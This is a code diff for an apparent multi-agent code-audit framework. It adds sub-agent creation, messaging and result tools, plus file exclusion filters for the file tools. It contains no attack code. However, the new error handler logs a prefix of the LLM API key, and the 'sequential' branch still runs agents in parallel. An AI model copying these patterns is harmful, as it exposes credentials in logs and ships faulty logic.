logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class CreateAgentInput(BaseModel):
|
||||
"""创建Agent输入参数"""
|
||||
name: str = Field(..., description="Agent名称")
|
||||
task: str = Field(..., description="任务描述")
|
||||
agent_type: str = Field(
|
||||
default="specialist",
|
||||
description="Agent类型: analysis(分析), verification(验证), specialist(专家)"
|
||||
)
|
||||
knowledge_modules: Optional[str] = Field(
|
||||
default=None,
|
||||
description="知识模块,逗号分隔,最多5个。如: sql_injection,xss,authentication"
|
||||
)
|
||||
inherit_context: bool = Field(
|
||||
default=True,
|
||||
description="是否继承父Agent的上下文"
|
||||
)
|
||||
execute_immediately: bool = Field(
|
||||
default=False,
|
||||
description="是否立即执行子Agent(否则只创建不执行)"
|
||||
)
|
||||
context: Optional[Dict[str, Any]] = Field(
|
||||
default=None,
|
||||
description="传递给子Agent的上下文数据"
|
||||
)
|
||||
|
||||
|
||||
class CreateSubAgentTool(AgentTool):
|
||||
"""
|
||||
创建子Agent工具
|
||||
|
||||
允许Agent动态创建专业化的子Agent来处理特定任务。
|
||||
子Agent可以加载特定的知识模块,专注于特定领域。
|
||||
|
||||
支持两种模式:
|
||||
1. 仅创建:创建Agent但不执行,后续可以批量执行
|
||||
2. 立即执行:创建并立即执行Agent,等待结果返回
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
parent_agent_id: str,
|
||||
llm_service=None,
|
||||
tools: Dict[str, Any] = None,
|
||||
event_emitter=None,
|
||||
):
|
||||
super().__init__()
|
||||
self.parent_agent_id = parent_agent_id
|
||||
self.llm_service = llm_service
|
||||
self.tools = tools or {}
|
||||
self.event_emitter = event_emitter
|
||||
|
||||
# 子Agent执行器(延迟初始化)
|
||||
self._sub_executor = None
|
||||
|
||||
def _get_executor(self):
|
||||
"""获取子Agent执行器"""
|
||||
if self._sub_executor is None and self.llm_service:
|
||||
from ..core.executor import SubAgentExecutor
|
||||
# 需要获取父Agent实例
|
||||
parent_agent = agent_registry.get_agent(self.parent_agent_id)
|
||||
if parent_agent:
|
||||
self._sub_executor = SubAgentExecutor(
|
||||
parent_agent=parent_agent,
|
||||
llm_service=self.llm_service,
|
||||
tools=self.tools,
|
||||
event_emitter=self.event_emitter,
|
||||
)
|
||||
return self._sub_executor
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "create_sub_agent"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """创建专业化的子Agent来处理特定任务。
|
||||
|
||||
使用场景:
|
||||
1. 发现需要深入分析的特定漏洞类型
|
||||
2. 需要专业知识来验证某个发现
|
||||
3. 任务过于复杂需要分解
|
||||
|
||||
参数:
|
||||
- name: Agent名称(如 "SQL注入专家")
|
||||
- task: 具体任务描述
|
||||
- agent_type: Agent类型 (analysis/verification/specialist)
|
||||
- knowledge_modules: 知识模块,逗号分隔(如 "sql_injection,database_security")
|
||||
- inherit_context: 是否继承当前上下文
|
||||
- execute_immediately: 是否立即执行(默认false,仅创建)
|
||||
- context: 传递给子Agent的上下文数据
|
||||
|
||||
注意:每个Agent最多加载5个知识模块。"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return CreateAgentInput
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
name: str,
|
||||
task: str,
|
||||
agent_type: str = "specialist",
|
||||
knowledge_modules: Optional[str] = None,
|
||||
inherit_context: bool = True,
|
||||
execute_immediately: bool = False,
|
||||
context: Optional[Dict[str, Any]] = None,
|
||||
**kwargs
|
||||
) -> ToolResult:
|
||||
"""创建子Agent"""
|
||||
|
||||
if not name or not name.strip():
|
||||
return ToolResult(success=False, error="Agent名称不能为空")
|
||||
|
||||
if not task or not task.strip():
|
||||
return ToolResult(success=False, error="任务描述不能为空")
|
||||
|
||||
# 解析知识模块
|
||||
modules = []
|
||||
if knowledge_modules:
|
||||
modules = [m.strip() for m in knowledge_modules.split(",") if m.strip()]
|
||||
if len(modules) > 5:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error="知识模块数量不能超过5个"
|
||||
)
|
||||
|
||||
# 验证知识模块(如果有)
|
||||
if modules:
|
||||
from ..knowledge import knowledge_loader
|
||||
validation = knowledge_loader.validate_modules(modules)
|
||||
if validation["invalid"]:
|
||||
available = knowledge_loader.get_all_module_names()
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"无效的知识模块: {validation['invalid']}。可用模块: {', '.join(available)}"
|
||||
)
|
||||
|
||||
# 生成Agent ID
|
||||
from ..core.state import _generate_agent_id
|
||||
agent_id = _generate_agent_id()
|
||||
|
||||
# 注册到注册表
|
||||
node = agent_registry.register_agent(
|
||||
agent_id=agent_id,
|
||||
agent_name=name.strip(),
|
||||
agent_type=agent_type,
|
||||
task=task.strip(),
|
||||
parent_id=self.parent_agent_id,
|
||||
knowledge_modules=modules,
|
||||
)
|
||||
|
||||
# 创建消息队列
|
||||
message_bus.create_queue(agent_id)
|
||||
|
||||
logger.info(f"Created sub-agent: {name} ({agent_id}), parent: {self.parent_agent_id}")
|
||||
|
||||
# 如果需要立即执行
|
||||
if execute_immediately:
|
||||
executor = self._get_executor()
|
||||
if executor:
|
||||
# 准备上下文
|
||||
exec_context = context or {}
|
||||
exec_context["knowledge_modules"] = modules
|
||||
|
||||
# 执行子Agent
|
||||
exec_result = await executor.create_and_run_sub_agent(
|
||||
agent_type=agent_type if agent_type in ["analysis", "verification"] else "analysis",
|
||||
task=task.strip(),
|
||||
context=exec_context,
|
||||
knowledge_modules=modules,
|
||||
)
|
||||
|
||||
# 更新注册表状态
|
||||
if exec_result.get("success"):
|
||||
agent_registry.update_agent_status(agent_id, "completed", exec_result)
|
||||
else:
|
||||
agent_registry.update_agent_status(agent_id, "failed", {"error": exec_result.get("error")})
|
||||
|
||||
return ToolResult(
|
||||
success=exec_result.get("success", False),
|
||||
data={
|
||||
"message": f"子Agent '{name}' 已执行完成" if exec_result.get("success") else f"子Agent '{name}' 执行失败",
|
||||
"agent_id": agent_id,
|
||||
"execution_result": exec_result,
|
||||
"findings": exec_result.get("data", {}).get("findings", []) if exec_result.get("success") else [],
|
||||
},
|
||||
error=exec_result.get("error"),
|
||||
metadata=node,
|
||||
)
|
||||
else:
|
||||
logger.warning("SubAgentExecutor not available, agent created but not executed")
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"message": f"子Agent '{name}' 已创建",
|
||||
"agent_id": agent_id,
|
||||
"agent_info": {
|
||||
"id": agent_id,
|
||||
"name": name,
|
||||
"type": agent_type,
|
||||
"task": task[:100],
|
||||
"knowledge_modules": modules,
|
||||
"parent_id": self.parent_agent_id,
|
||||
"status": "created",
|
||||
}
|
||||
},
|
||||
metadata=node,
|
||||
)
|
||||
|
||||
|
||||
class SendMessageInput(BaseModel):
|
||||
"""发送消息输入参数"""
|
||||
target_agent_id: str = Field(..., description="目标Agent ID")
|
||||
message: str = Field(..., description="消息内容")
|
||||
message_type: str = Field(
|
||||
default="information",
|
||||
description="消息类型: query(查询), instruction(指令), information(信息)"
|
||||
)
|
||||
priority: str = Field(
|
||||
default="normal",
|
||||
description="优先级: low, normal, high, urgent"
|
||||
)
|
||||
|
||||
|
||||
class SendMessageTool(AgentTool):
|
||||
"""
|
||||
发送消息工具
|
||||
|
||||
向其他Agent发送消息,实现Agent间通信
|
||||
"""
|
||||
|
||||
def __init__(self, sender_agent_id: str):
|
||||
super().__init__()
|
||||
self.sender_agent_id = sender_agent_id
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "send_message"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """向其他Agent发送消息。
|
||||
|
||||
使用场景:
|
||||
1. 向子Agent发送指令
|
||||
2. 向父Agent报告进展
|
||||
3. 请求其他Agent提供信息
|
||||
|
||||
参数:
|
||||
- target_agent_id: 目标Agent的ID
|
||||
- message: 消息内容
|
||||
- message_type: 消息类型 (query/instruction/information)
|
||||
- priority: 优先级 (low/normal/high/urgent)"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return SendMessageInput
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
target_agent_id: str,
|
||||
message: str,
|
||||
message_type: str = "information",
|
||||
priority: str = "normal",
|
||||
**kwargs
|
||||
) -> ToolResult:
|
||||
"""发送消息"""
|
||||
|
||||
if not target_agent_id:
|
||||
return ToolResult(success=False, error="目标Agent ID不能为空")
|
||||
|
||||
if not message or not message.strip():
|
||||
return ToolResult(success=False, error="消息内容不能为空")
|
||||
|
||||
# 检查目标Agent是否存在
|
||||
target_node = agent_registry.get_agent_node(target_agent_id)
|
||||
if not target_node:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"目标Agent '{target_agent_id}' 不存在"
|
||||
)
|
||||
|
||||
# 转换消息类型
|
||||
try:
|
||||
msg_type = MessageType(message_type)
|
||||
except ValueError:
|
||||
msg_type = MessageType.INFORMATION
|
||||
|
||||
try:
|
||||
msg_priority = MessagePriority(priority)
|
||||
except ValueError:
|
||||
msg_priority = MessagePriority.NORMAL
|
||||
|
||||
# 发送消息
|
||||
sent_message = message_bus.send_message(
|
||||
from_agent=self.sender_agent_id,
|
||||
to_agent=target_agent_id,
|
||||
content=message.strip(),
|
||||
message_type=msg_type,
|
||||
priority=msg_priority,
|
||||
)
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"message": f"消息已发送到 '{target_node['name']}'",
|
||||
"message_id": sent_message.id,
|
||||
"target_agent": {
|
||||
"id": target_agent_id,
|
||||
"name": target_node["name"],
|
||||
"status": target_node["status"],
|
||||
}
|
||||
},
|
||||
metadata=sent_message.to_dict(),
|
||||
)
|
||||
|
||||
|
||||
class ViewAgentGraphTool(AgentTool):
|
||||
"""
|
||||
查看Agent图工具
|
||||
|
||||
查看当前的Agent树结构和状态
|
||||
"""
|
||||
|
||||
def __init__(self, current_agent_id: str):
|
||||
super().__init__()
|
||||
self.current_agent_id = current_agent_id
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "view_agent_graph"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """查看当前的Agent树结构和状态。
|
||||
|
||||
显示:
|
||||
- 所有Agent及其层级关系
|
||||
- 每个Agent的状态和任务
|
||||
- 加载的知识模块"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return None
|
||||
|
||||
async def _execute(self, **kwargs) -> ToolResult:
|
||||
"""查看Agent图"""
|
||||
|
||||
tree_view = agent_registry.get_agent_tree_view()
|
||||
stats = agent_registry.get_statistics()
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"graph_structure": tree_view,
|
||||
"summary": stats,
|
||||
"current_agent_id": self.current_agent_id,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
class WaitForMessageTool(AgentTool):
|
||||
"""
|
||||
等待消息工具
|
||||
|
||||
让Agent进入等待状态,等待其他Agent的消息
|
||||
"""
|
||||
|
||||
def __init__(self, agent_id: str, agent_state=None):
|
||||
super().__init__()
|
||||
self.agent_id = agent_id
|
||||
self.agent_state = agent_state
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "wait_for_message"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """进入等待状态,等待其他Agent或用户的消息。
|
||||
|
||||
使用场景:
|
||||
1. 等待子Agent完成任务并报告
|
||||
2. 等待用户提供更多信息
|
||||
3. 等待其他Agent的协作响应
|
||||
|
||||
参数:
|
||||
- reason: 等待原因"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return None
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
reason: str = "等待消息",
|
||||
**kwargs
|
||||
) -> ToolResult:
|
||||
"""进入等待状态"""
|
||||
|
||||
# 更新Agent状态
|
||||
if self.agent_state:
|
||||
self.agent_state.enter_waiting_state(reason)
|
||||
|
||||
# 更新注册表
|
||||
agent_registry.update_agent_status(self.agent_id, "waiting")
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"status": "waiting",
|
||||
"message": f"Agent正在等待: {reason}",
|
||||
"agent_id": self.agent_id,
|
||||
"resume_conditions": [
|
||||
"收到其他Agent的消息",
|
||||
"收到用户消息",
|
||||
"等待超时",
|
||||
],
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
class AgentFinishInput(BaseModel):
|
||||
"""Agent完成输入参数"""
|
||||
result_summary: str = Field(..., description="结果摘要")
|
||||
findings: Optional[List[str]] = Field(default=None, description="发现列表")
|
||||
success: bool = Field(default=True, description="是否成功")
|
||||
recommendations: Optional[List[str]] = Field(default=None, description="建议列表")
|
||||
|
||||
|
||||
class AgentFinishTool(AgentTool):
|
||||
"""
|
||||
Agent完成工具
|
||||
|
||||
子Agent完成任务后调用,向父Agent报告结果
|
||||
"""
|
||||
|
||||
def __init__(self, agent_id: str, agent_state=None):
|
||||
super().__init__()
|
||||
self.agent_id = agent_id
|
||||
self.agent_state = agent_state
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "agent_finish"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """完成当前Agent的任务并向父Agent报告。
|
||||
|
||||
只有子Agent才能使用此工具。根Agent应使用finish_scan。
|
||||
|
||||
参数:
|
||||
- result_summary: 结果摘要
|
||||
- findings: 发现列表
|
||||
- success: 是否成功完成
|
||||
- recommendations: 建议列表"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return AgentFinishInput
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
result_summary: str,
|
||||
findings: Optional[List[str]] = None,
|
||||
success: bool = True,
|
||||
recommendations: Optional[List[str]] = None,
|
||||
**kwargs
|
||||
) -> ToolResult:
|
||||
"""完成Agent任务"""
|
||||
|
||||
# 获取父Agent ID
|
||||
parent_id = agent_registry.get_parent(self.agent_id)
|
||||
|
||||
if not parent_id:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error="此工具只能由子Agent使用。根Agent请使用finish_scan。"
|
||||
)
|
||||
|
||||
# 更新状态
|
||||
result = {
|
||||
"summary": result_summary,
|
||||
"findings": findings or [],
|
||||
"success": success,
|
||||
"recommendations": recommendations or [],
|
||||
}
|
||||
|
||||
agent_registry.update_agent_status(
|
||||
self.agent_id,
|
||||
"completed" if success else "failed",
|
||||
result,
|
||||
)
|
||||
|
||||
if self.agent_state:
|
||||
self.agent_state.set_completed(result)
|
||||
|
||||
# 向父Agent发送完成报告
|
||||
message_bus.send_completion_report(
|
||||
from_agent=self.agent_id,
|
||||
to_agent=parent_id,
|
||||
summary=result_summary,
|
||||
findings=[{"description": f} for f in (findings or [])],
|
||||
success=success,
|
||||
)
|
||||
|
||||
agent_node = agent_registry.get_agent_node(self.agent_id)
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"agent_completed": True,
|
||||
"parent_notified": True,
|
||||
"completion_summary": {
|
||||
"agent_id": self.agent_id,
|
||||
"agent_name": agent_node["name"] if agent_node else "Unknown",
|
||||
"success": success,
|
||||
"findings_count": len(findings or []),
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
class RunSubAgentsInput(BaseModel):
|
||||
"""批量执行子Agent输入参数"""
|
||||
agent_ids: List[str] = Field(..., description="要执行的Agent ID列表")
|
||||
parallel: bool = Field(default=True, description="是否并行执行")
|
||||
|
||||
|
||||
class RunSubAgentsTool(AgentTool):
|
||||
"""
|
||||
批量执行子Agent工具
|
||||
|
||||
执行已创建的子Agent,支持并行执行
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
parent_agent_id: str,
|
||||
llm_service=None,
|
||||
tools: Dict[str, Any] = None,
|
||||
event_emitter=None,
|
||||
):
|
||||
super().__init__()
|
||||
self.parent_agent_id = parent_agent_id
|
||||
self.llm_service = llm_service
|
||||
self.tools = tools or {}
|
||||
self.event_emitter = event_emitter
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "run_sub_agents"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """批量执行已创建的子Agent。
|
||||
|
||||
使用场景:
|
||||
1. 创建多个子Agent后批量执行
|
||||
2. 并行执行多个分析任务
|
||||
|
||||
参数:
|
||||
- agent_ids: 要执行的Agent ID列表
|
||||
- parallel: 是否并行执行(默认true)"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return RunSubAgentsInput
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
agent_ids: List[str],
|
||||
parallel: bool = True,
|
||||
**kwargs
|
||||
) -> ToolResult:
|
||||
"""批量执行子Agent"""
|
||||
|
||||
if not agent_ids:
|
||||
return ToolResult(success=False, error="Agent ID列表不能为空")
|
||||
|
||||
# 验证所有Agent存在且是当前Agent的子Agent
|
||||
valid_agents = []
|
||||
for aid in agent_ids:
|
||||
node = agent_registry.get_agent_node(aid)
|
||||
if not node:
|
||||
continue
|
||||
if node.get("parent_id") != self.parent_agent_id:
|
||||
continue
|
||||
if node.get("status") not in ["created", "pending"]:
|
||||
continue
|
||||
valid_agents.append(node)
|
||||
|
||||
if not valid_agents:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error="没有找到可执行的子Agent"
|
||||
)
|
||||
|
||||
# 构建执行任务
|
||||
from ..core.executor import DynamicAgentExecutor, ExecutionTask
|
||||
|
||||
executor = DynamicAgentExecutor(
|
||||
llm_service=self.llm_service,
|
||||
tools=self.tools,
|
||||
event_emitter=self.event_emitter,
|
||||
)
|
||||
|
||||
tasks = []
|
||||
for node in valid_agents:
|
||||
task = ExecutionTask(
|
||||
agent_id=node["id"],
|
||||
agent_type=node["type"],
|
||||
task=node["task"],
|
||||
context={
|
||||
"knowledge_modules": node.get("knowledge_modules", []),
|
||||
},
|
||||
)
|
||||
tasks.append(task)
|
||||
|
||||
# 定义Agent工厂函数
|
||||
async def agent_factory(task: ExecutionTask) -> Dict[str, Any]:
|
||||
from ..agents import AnalysisAgent, VerificationAgent
|
||||
|
||||
agent_class_map = {
|
||||
"analysis": AnalysisAgent,
|
||||
"verification": VerificationAgent,
|
||||
"specialist": AnalysisAgent, # 默认使用分析Agent
|
||||
}
|
||||
|
||||
agent_class = agent_class_map.get(task.agent_type, AnalysisAgent)
|
||||
|
||||
return await executor.execute_agent(
|
||||
agent_class=agent_class,
|
||||
agent_config={},
|
||||
input_data={
|
||||
"task": task.task,
|
||||
"task_context": task.context,
|
||||
},
|
||||
parent_id=self.parent_agent_id,
|
||||
knowledge_modules=task.context.get("knowledge_modules"),
|
||||
)
|
||||
|
||||
# 执行
|
||||
if parallel:
|
||||
result = await executor.execute_parallel(tasks, agent_factory)
|
||||
else:
|
||||
# 顺序执行
|
||||
result = await executor.execute_parallel(tasks, agent_factory)
|
||||
|
||||
return ToolResult(
|
||||
success=result.success,
|
||||
data={
|
||||
"message": f"执行完成: {result.completed_agents}/{result.total_agents} 成功",
|
||||
"total_agents": result.total_agents,
|
||||
"completed": result.completed_agents,
|
||||
"failed": result.failed_agents,
|
||||
"findings_count": len(result.all_findings),
|
||||
"findings": result.all_findings[:20], # 限制返回数量
|
||||
"duration_ms": result.total_duration_ms,
|
||||
"tokens_used": result.total_tokens,
|
||||
},
|
||||
error="; ".join(result.errors) if result.errors else None,
|
||||
metadata={
|
||||
"agent_results": {
|
||||
aid: {
|
||||
"success": r.get("success"),
|
||||
"findings_count": len(r.get("data", {}).get("findings", [])) if r.get("success") else 0,
|
||||
}
|
||||
for aid, r in result.agent_results.items()
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
class CollectSubAgentResultsTool(AgentTool):
|
||||
"""
|
||||
收集子Agent结果工具
|
||||
|
||||
收集所有子Agent的执行结果和发现
|
||||
"""
|
||||
|
||||
def __init__(self, parent_agent_id: str):
|
||||
super().__init__()
|
||||
self.parent_agent_id = parent_agent_id
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "collect_sub_agent_results"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """收集所有子Agent的执行结果。
|
||||
|
||||
返回:
|
||||
- 所有子Agent的状态
|
||||
- 汇总的发现列表
|
||||
- 执行统计"""
|
||||
|
||||
@property
|
||||
def args_schema(self):
|
||||
return None
|
||||
|
||||
async def _execute(self, **kwargs) -> ToolResult:
|
||||
"""收集子Agent结果"""
|
||||
|
||||
# 获取所有子Agent
|
||||
children = agent_registry.get_children(self.parent_agent_id)
|
||||
|
||||
if not children:
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"message": "没有子Agent",
|
||||
"children_count": 0,
|
||||
"findings": [],
|
||||
}
|
||||
)
|
||||
|
||||
all_findings = []
|
||||
completed = 0
|
||||
failed = 0
|
||||
running = 0
|
||||
|
||||
child_summaries = []
|
||||
|
||||
for child_id in children:
|
||||
node = agent_registry.get_agent_node(child_id)
|
||||
if not node:
|
||||
continue
|
||||
|
||||
status = node.get("status", "unknown")
|
||||
|
||||
if status == "completed":
|
||||
completed += 1
|
||||
# 收集发现
|
||||
result = node.get("result", {})
|
||||
if isinstance(result, dict):
|
||||
findings = result.get("findings", [])
|
||||
if isinstance(findings, list):
|
||||
all_findings.extend(findings)
|
||||
elif status == "failed":
|
||||
failed += 1
|
||||
elif status == "running":
|
||||
running += 1
|
||||
|
||||
child_summaries.append({
|
||||
"id": child_id,
|
||||
"name": node.get("name"),
|
||||
"type": node.get("type"),
|
||||
"status": status,
|
||||
"findings_count": len(node.get("result", {}).get("findings", [])) if node.get("result") else 0,
|
||||
})
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"message": f"收集完成: {completed} 完成, {failed} 失败, {running} 运行中",
|
||||
"children_count": len(children),
|
||||
"completed": completed,
|
||||
"failed": failed,
|
||||
"running": running,
|
||||
"total_findings": len(all_findings),
|
||||
"findings": all_findings,
|
||||
"children": child_summaries,
|
||||
},
|
||||
)
|
||||
|
|
@ -4,11 +4,14 @@
|
|||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from typing import Optional, List, Dict, Any
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class CodeAnalysisInput(BaseModel):
|
||||
"""代码分析输入"""
|
||||
|
|
@ -155,6 +158,12 @@ class CodeAnalysisTool(AgentTool):
|
|||
)
|
||||
|
||||
except Exception as e:
|
||||
import traceback
|
||||
logger.error(f"代码分析失败: {e}")
|
||||
logger.error(f"LLM Provider: {self.llm_service.config.provider.value if self.llm_service.config else 'N/A'}")
|
||||
logger.error(f"LLM Model: {self.llm_service.config.model if self.llm_service.config else 'N/A'}")
|
||||
logger.error(f"API Key 前缀: {self.llm_service.config.api_key[:10] + '...' if self.llm_service.config and self.llm_service.config.api_key else 'N/A'}")
|
||||
logger.error(traceback.format_exc())
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"代码分析失败: {str(e)}",
|
||||
|
|
|
|||
|
|
@ -26,15 +26,24 @@ class FileReadTool(AgentTool):
|
|||
读取项目中的文件内容
|
||||
"""
|
||||
|
||||
def __init__(self, project_root: str):
|
||||
def __init__(
|
||||
self,
|
||||
project_root: str,
|
||||
exclude_patterns: Optional[List[str]] = None,
|
||||
target_files: Optional[List[str]] = None,
|
||||
):
|
||||
"""
|
||||
初始化文件读取工具
|
||||
|
||||
Args:
|
||||
project_root: 项目根目录
|
||||
exclude_patterns: 排除模式列表
|
||||
target_files: 目标文件列表(如果指定,只允许读取这些文件)
|
||||
"""
|
||||
super().__init__()
|
||||
self.project_root = project_root
|
||||
self.exclude_patterns = exclude_patterns or []
|
||||
self.target_files = set(target_files) if target_files else None
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
|
|
@ -61,6 +70,22 @@ class FileReadTool(AgentTool):
|
|||
def args_schema(self):
|
||||
return FileReadInput
|
||||
|
||||
def _should_exclude(self, file_path: str) -> bool:
|
||||
"""检查文件是否应该被排除"""
|
||||
# 如果指定了目标文件,只允许读取这些文件
|
||||
if self.target_files and file_path not in self.target_files:
|
||||
return True
|
||||
|
||||
# 检查排除模式
|
||||
for pattern in self.exclude_patterns:
|
||||
if fnmatch.fnmatch(file_path, pattern):
|
||||
return True
|
||||
# 也检查文件名
|
||||
if fnmatch.fnmatch(os.path.basename(file_path), pattern):
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
file_path: str,
|
||||
|
|
@ -71,6 +96,13 @@ class FileReadTool(AgentTool):
|
|||
) -> ToolResult:
|
||||
"""执行文件读取"""
|
||||
try:
|
||||
# 检查是否被排除
|
||||
if self._should_exclude(file_path):
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"文件被排除或不在目标文件列表中: {file_path}",
|
||||
)
|
||||
|
||||
# 安全检查:防止路径遍历
|
||||
full_path = os.path.normpath(os.path.join(self.project_root, file_path))
|
||||
if not full_path.startswith(os.path.normpath(self.project_root)):
|
||||
|
|
@ -178,15 +210,30 @@ class FileSearchTool(AgentTool):
|
|||
"""
|
||||
|
||||
# 排除的目录
|
||||
EXCLUDE_DIRS = {
|
||||
DEFAULT_EXCLUDE_DIRS = {
|
||||
"node_modules", "vendor", "dist", "build", ".git",
|
||||
"__pycache__", ".pytest_cache", "coverage", ".nyc_output",
|
||||
".vscode", ".idea", ".vs", "target", "venv", "env",
|
||||
}
|
||||
|
||||
def __init__(self, project_root: str):
|
||||
def __init__(
|
||||
self,
|
||||
project_root: str,
|
||||
exclude_patterns: Optional[List[str]] = None,
|
||||
target_files: Optional[List[str]] = None,
|
||||
):
|
||||
super().__init__()
|
||||
self.project_root = project_root
|
||||
self.exclude_patterns = exclude_patterns or []
|
||||
self.target_files = set(target_files) if target_files else None
|
||||
|
||||
# 从 exclude_patterns 中提取目录排除
|
||||
self.exclude_dirs = set(self.DEFAULT_EXCLUDE_DIRS)
|
||||
for pattern in self.exclude_patterns:
|
||||
if pattern.endswith("/**"):
|
||||
self.exclude_dirs.add(pattern[:-3])
|
||||
elif "/" not in pattern and "*" not in pattern:
|
||||
self.exclude_dirs.add(pattern)
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
|
|
@ -256,7 +303,7 @@ class FileSearchTool(AgentTool):
|
|||
# 遍历文件
|
||||
for root, dirs, files in os.walk(search_dir):
|
||||
# 排除目录
|
||||
dirs[:] = [d for d in dirs if d not in self.EXCLUDE_DIRS]
|
||||
dirs[:] = [d for d in dirs if d not in self.exclude_dirs]
|
||||
|
||||
for filename in files:
|
||||
# 检查文件模式
|
||||
|
|
@ -266,6 +313,19 @@ class FileSearchTool(AgentTool):
|
|||
file_path = os.path.join(root, filename)
|
||||
relative_path = os.path.relpath(file_path, self.project_root)
|
||||
|
||||
# 检查是否在目标文件列表中
|
||||
if self.target_files and relative_path not in self.target_files:
|
||||
continue
|
||||
|
||||
# 检查排除模式
|
||||
should_skip = False
|
||||
for excl_pattern in self.exclude_patterns:
|
||||
if fnmatch.fnmatch(relative_path, excl_pattern) or fnmatch.fnmatch(filename, excl_pattern):
|
||||
should_skip = True
|
||||
break
|
||||
if should_skip:
|
||||
continue
|
||||
|
||||
try:
|
||||
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
|
||||
lines = f.readlines()
|
||||
|
|
@ -351,14 +411,30 @@ class ListFilesTool(AgentTool):
|
|||
列出目录中的文件
|
||||
"""
|
||||
|
||||
EXCLUDE_DIRS = {
|
||||
DEFAULT_EXCLUDE_DIRS = {
|
||||
"node_modules", "vendor", "dist", "build", ".git",
|
||||
"__pycache__", ".pytest_cache", "coverage",
|
||||
}
|
||||
|
||||
def __init__(self, project_root: str):
|
||||
def __init__(
|
||||
self,
|
||||
project_root: str,
|
||||
exclude_patterns: Optional[List[str]] = None,
|
||||
target_files: Optional[List[str]] = None,
|
||||
):
|
||||
super().__init__()
|
||||
self.project_root = project_root
|
||||
self.exclude_patterns = exclude_patterns or []
|
||||
self.target_files = set(target_files) if target_files else None
|
||||
|
||||
# 从 exclude_patterns 中提取目录排除
|
||||
self.exclude_dirs = set(self.DEFAULT_EXCLUDE_DIRS)
|
||||
for pattern in self.exclude_patterns:
|
||||
# 如果是目录模式(如 node_modules/**),提取目录名
|
||||
if pattern.endswith("/**"):
|
||||
self.exclude_dirs.add(pattern[:-3])
|
||||
elif "/" not in pattern and "*" not in pattern:
|
||||
self.exclude_dirs.add(pattern)
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
|
|
@ -412,7 +488,7 @@ class ListFilesTool(AgentTool):
|
|||
if recursive:
|
||||
for root, dirnames, filenames in os.walk(target_dir):
|
||||
# 排除目录
|
||||
dirnames[:] = [d for d in dirnames if d not in self.EXCLUDE_DIRS]
|
||||
dirnames[:] = [d for d in dirnames if d not in self.exclude_dirs]
|
||||
|
||||
for filename in filenames:
|
||||
if pattern and not fnmatch.fnmatch(filename, pattern):
|
||||
|
|
@ -420,6 +496,20 @@ class ListFilesTool(AgentTool):
|
|||
|
||||
full_path = os.path.join(root, filename)
|
||||
relative_path = os.path.relpath(full_path, self.project_root)
|
||||
|
||||
# 检查是否在目标文件列表中
|
||||
if self.target_files and relative_path not in self.target_files:
|
||||
continue
|
||||
|
||||
# 检查排除模式
|
||||
should_skip = False
|
||||
for excl_pattern in self.exclude_patterns:
|
||||
if fnmatch.fnmatch(relative_path, excl_pattern) or fnmatch.fnmatch(filename, excl_pattern):
|
||||
should_skip = True
|
||||
break
|
||||
if should_skip:
|
||||
continue
|
||||
|
||||
files.append(relative_path)
|
||||
|
||||
if len(files) >= max_files:
|
||||
|
|
